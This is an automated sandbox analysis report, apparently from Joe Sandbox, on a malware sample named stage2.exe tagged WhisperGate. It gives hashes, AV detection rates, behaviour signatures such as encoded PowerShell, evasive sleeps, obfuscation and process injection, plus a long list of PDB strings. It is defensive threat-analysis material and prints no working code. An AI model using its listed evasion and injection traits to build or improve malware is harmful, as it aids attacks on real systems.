Windows Analysis Report stage2.exe

Overview

General Information

Sample Name:	stage2.exe
Analysis ID:	553986
MD5:	14c8482f302b5e81e3fa1b18a509289d
SHA1:	16525cb2fd86dce842107eb1ba6174b23f188537
SHA256:	dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags:	DEV-0586exeWhisperGate
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected MSILDownloaderGeneric

Sigma detected: Suspicious Encoded PowerShell Command Line

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Sigma detected: Suspicious Execution of Powershell with Base64

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: stage2.exe	Virustotal: Detection: 44%			Perma Link
Source: stage2.exe	ReversingLabs: Detection: 48%

Machine Learning detection for sample

Source: stage2.exe

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0 CryptReleaseContext,	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0 CryptReleaseContext,	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0 CryptReleaseContext,	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0 CryptReleaseContext,	13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07A341F0 CryptReleaseContext,	13_2_07A341F0

Compliance:

Uses 32bit PE files

Source: stage2.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2

Source: stage2.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source:	Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
Source:	Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source:	Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source:	Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
